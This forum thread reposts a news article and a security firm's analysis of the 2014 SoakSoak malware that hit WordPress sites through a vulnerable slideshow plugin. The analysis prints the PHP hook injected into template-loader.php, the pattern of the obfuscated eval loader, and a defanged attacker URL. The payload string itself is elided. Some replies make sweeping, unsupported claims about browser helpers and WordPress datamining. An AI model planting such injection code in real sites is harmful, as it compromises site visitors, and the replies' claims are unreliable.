Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
Mysterious Russian Malware Is Infecting 100,000+ Wordpress Sites

December 15, 2014

A Russian malware called SoakSoak has infected over 100,000 Wordpress
sites since this Sunday, turning blogs into attack platforms. It's a
potential shitshow, and it could've been prevented earlier this fall.

Google has already blocked 11,000 domains to try to curb the damage.
According to security firm Sucuri, the malware uses a vulnerability in a
slideshow plug-in called Slider Revolution. The Slider Revolution team
has known about the vulnerability since September, but it looks like
they failed to fix it before the security hole got crammed with steaming
hot malware.

Researchers at Sucuri are warning that it'll be hard to completely
eradicate the malware as long as so many site owners don't know it's
there. In addition to removing the malicious code, they will need to
update the premium plug-in. If the plug-in came as part of a theme, it
won't update automatically, which means site admins will have to
manually update.

Gaming site Dulfy was one of first infected domains to fix the problem
by removing code and going behind a firewall, but it may persist on
blogs with less diligent administrators indefinitely. And Dulfy's admin
isn't sure the fix is permanent. "The firewall will be a temporary
measure until we can figure out what is doing it," site owner Kristina
Hunter told me.

http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522

See also:

http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html

===============
The impact seems to be affecting most hosts across the WordPress hosting
spectrum. Quick breakdown of the decoding process is available via our
PHP Decoder.
SoakSoak Malware Anatomy

It is modifying the file wp-includes/template-loader.php and including
this content:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

This causes the wp-includes/js/swfobject.js to be loaded on every page
you view on the site which includes the malware here:

eval(decodeURIComponent (big long alpha numeric string"));

This malware when decoded loads a javascript malware from the
SoakSoack.ru domain, specifically this file:  
hxxp://soaksoak.ru/xteas/code

(note:  As of this writing, soaksoak.ru does not resolve)

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

wrote:

Quoted text here. Click to load it

    I have not used Wordpress for ages now, due to it's mandatory
scripting. Any site that thinks that datamining is more important than
user's safety is not worth visiting, IMHO.
    So ... not a problem for me.
    []'s
--  
Don't be evil - Google 2004
We have a new policy  - Google 2012

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

On Tuesday, December 16, 2014 11:59:00 PM UTC+8, Shadow wrote:
Quoted text here. Click to load it
  
Quoted text here. Click to load it

How can this affect a reader of WordPress?  A user I can see, but a reader, with an updated browser, has nothing to fear?

RL

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

On Tue, 16 Dec 2014 08:59:12 -0800 (PST), RayLopez99

Quoted text here. Click to load it

    "Updated browser" just means "updated backdoors". Apparently
you have to enable scripts that download browser helpers to read the
docs. The browser helpers are malware. If you block scripts, you
cannot read Wordpress pages. Try blocking it with NoScript and see.
    []'s
--  
Don't be evil - Google 2004
We have a new policy  - Google 2012

Re: Mysterious Russian Malware (SoakSoak) Is Infecting 100,000+ Wordpress Sites

On Wednesday, December 17, 2014 3:36:39 AM UTC+8, Shadow wrote:
  
Quoted text here. Click to load it
  
I see, it makes sense.  Indeed I tried blocking with AdBlock a popular Wordpress site and indeed it did not work right.

RL

Site Timeline